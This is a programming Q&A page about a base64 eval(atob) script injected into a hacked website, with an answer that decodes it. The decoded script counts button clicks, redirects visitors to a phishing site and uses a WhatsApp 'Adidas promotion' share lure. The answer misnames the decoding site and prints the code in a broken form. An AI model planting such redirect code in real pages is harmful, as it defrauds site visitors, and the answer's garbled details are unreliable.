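Decoding strange JavaScript code

Time: 2018-05-21 22:39:48

Tags: javascript

I don't know much about decoding and encoding, but I found this on my website (it was hacked and someone took over a page on my site). I analyzed the page but can't understand it: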

    <script type="text/javascript">
    eval(atob("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"));
    </script>

What does this mean? How can I read it?

1 answer:

Answer 0: (score: 4)

This is a base64-encoded code snippet that will be evaluated at runtime.

Your code

    <script type="text/javascript">
    eval(atob("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"));
    </script>

Decoding steps (simple steps)

  1. Go to base63decode.org
  2. Copy the code inside the atob block.
  3. Paste it into the encoded string box and press decode.
  4. The decoded code

    <script type="text/javascript">
    eval(var c = 0;
    $(document).ready(function() {
        $("#b1").on('click', function() {
            ++c;
            if (c > 15) {
                $(this).attr({
                    href: "[ a phishing URL -- removed ]",
                    target: "_self"
                });
            }
        });
        $("#b2").on('click', function() {
            if (c > 20) window.location = "[ a phishing URL -- removed ]";
            else window.alert("Deel aan 20 van je vrienden over WhatsApp de Adidas promotie!\n\n Je moet delen " + c);
        });
    }););
    </script>
    

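What this does

The first code is decoded, and events are captured on two buttons with the unique IDs b1 and b2. Based on the number of clicks, it decides whether a location change takes place or a new tab is created, with the phishing site as the condition. If anything goes wrong: after 15 clicks on this button you will be navigated to this URL, and after 20 clicks a new window will be generated with this URL.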
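
The same decoding can be done locally, without pasting the string into a third-party site and without ever running the payload. The following is an added example, not part of the original answer: it runs under Node.js, finds `eval(atob("..."))` wrappers in page text and returns the decoded source as plain text, following nested layers. The function names and the sample page (with a harmless payload) are constructed for this illustration.

```javascript
// Statically unwrap eval(atob("...")) layers; the payload is only read, never executed.
// SAMPLE_PAGE is constructed for this example and carries a harmless statement.
const SAMPLE_INNER = 'var c = 0; console.log("clicks", c);';
const SAMPLE_PAGE =
  '<script type="text/javascript">\n' +
  'eval(atob("' + Buffer.from(SAMPLE_INNER, 'utf8').toString('base64') + '"));\n' +
  '</script>';

// Matches eval(atob("...")) or eval(window.atob('...')) with a literal string argument.
const WRAPPER =
  /eval\s*\(\s*(?:window\.)?atob\s*\(\s*(["'])([A-Za-z0-9+\/=\s]+)\1\s*\)\s*\)/g;

function decodeBase64Strict(b64) {
  const compact = b64.replace(/\s+/g, '');
  // Buffer.from silently skips invalid characters, so validate the shape first.
  if (compact.length % 4 !== 0 || !/^[A-Za-z0-9+\/]*={0,2}$/.test(compact)) {
    throw new Error('not well-formed base64');
  }
  return Buffer.from(compact, 'base64').toString('utf8');
}

// Returns [{ depth, source }] for every decoded layer, outermost first.
function unwrapEvalAtob(text, maxDepth = 5) {
  const layers = [];
  const queue = [{ depth: 0, text }];
  while (queue.length > 0) {
    const { depth, text: current } = queue.shift();
    if (depth >= maxDepth) continue; // bound the work on deeply nested wrappers
    for (const m of current.matchAll(WRAPPER)) {
      let source;
      try { source = decodeBase64Strict(m[2]); } catch { continue; }
      layers.push({ depth: depth + 1, source });
      queue.push({ depth: depth + 1, text: source });
    }
  }
  return layers;
}

for (const layer of unwrapEvalAtob(SAMPLE_PAGE)) {
  console.log(`--- layer ${layer.depth} ---\n${layer.source}`);
}
```

Feeding the saved HTML of the compromised page to `unwrapEvalAtob` gives the script text to review and to search for in the rest of the site's files.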